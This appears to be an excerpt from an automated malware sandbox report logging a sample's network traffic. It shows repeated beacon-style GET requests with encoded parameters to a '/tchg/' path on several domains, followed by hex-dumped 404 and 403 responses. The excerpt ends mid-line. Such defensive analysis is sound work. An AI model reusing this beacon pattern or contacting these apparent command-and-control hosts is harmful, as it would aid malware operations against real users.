      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=RUgOIEC2bpKEAb3gt63mE+Z8A/D48vS2kv7pSD36MjRmJGY6VLK565PH5Ya2jxSU9dFBv1ZYes9vP/U9IpvgXfidz0YLsWTogQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.fairbitawayposearisk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=oRufhoY+bc3ycM+VgiODBrp+vj6j24zBH4XRbixJn1DYBt5l7xCYw/uqkQ1xxa9R7WiXu6y4y7mJHWOjUCQ2GcjHOqMUPQqZlA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.dkansai-cp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=27zP+uSjjQlLnilOnGJCOrnozMlpBRLg3OEmXmWOVdAdyewLZJq+JAgQDNVT6O1S8K/UhNHecCZNR/ARSVl+YwbS8ARBrMbIDw==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.comoparardefumar.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=jQDaGZ2OScTGFSP10uKTPyhqI710WSvw2gViBbUugbcSlWDCi533rl6vPGA30o5eyDb36C/pQ3h7az/b16KQNynftoBCqLFM3A==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.albaymedya.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?2ax=jRqfPy4_lz2&O0qEM=t2tzMhBRWo10Eosyb8KFBuaI1V5h8MV7T2bC3+E0nZXV+FHXmJExWsZaqAHQ5axaFjoD9IuPadSp7WKT8CRkiPajdeOXH8cJLw== HTTP/1.1Host: www.oleictude.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=4yLegaT1sivciznwGwL+1oWFxAOSGQRZOQeAHXS5UhA0sXonzOuQC/8xHc6XJGn9K9HBDd08hbjXm0qB4TniN4OVF/4Ot7tkHQ==&2ax=jRqfPy4_lz2 HTTP/1.1Host: www.scottsteedley.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?2ax=jRqfPy4_lz2&O0qEM=IiqkKM0fZYbcVAhAnum4m1H4t/7jN9R9rdXOIOC6/CZopBQ7QWkcbeNISYKTY0qHDgk4y1fleDCOJFlZ6etMDJwjph9a+HDsvg== HTTP/1.1Host: www.arrangeabreak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 130.185.109.77 130.185.109.77
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:08:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:08:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:08:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:08:16 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Tue, 30 May 2023 09:08:21 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Tue, 30 May 2023 09:08:24 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Tue, 30 May 2023 09:08:27 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 30 May 2023 09:08:48 GMTServer: ApacheContent-Length: 4406Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 30 May 2023 09:08:51 GMTServer: ApacheContent-Length: 4406Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 30 May 2023 09:08:54 GMTServer: ApacheContent-Length: 4406Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 30 May 2023 09:08:57 GMTServer: ApacheContent-Length: 4406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Tue, 30 May 2023 09:09:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Tue, 30 May 2023 09:09:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data 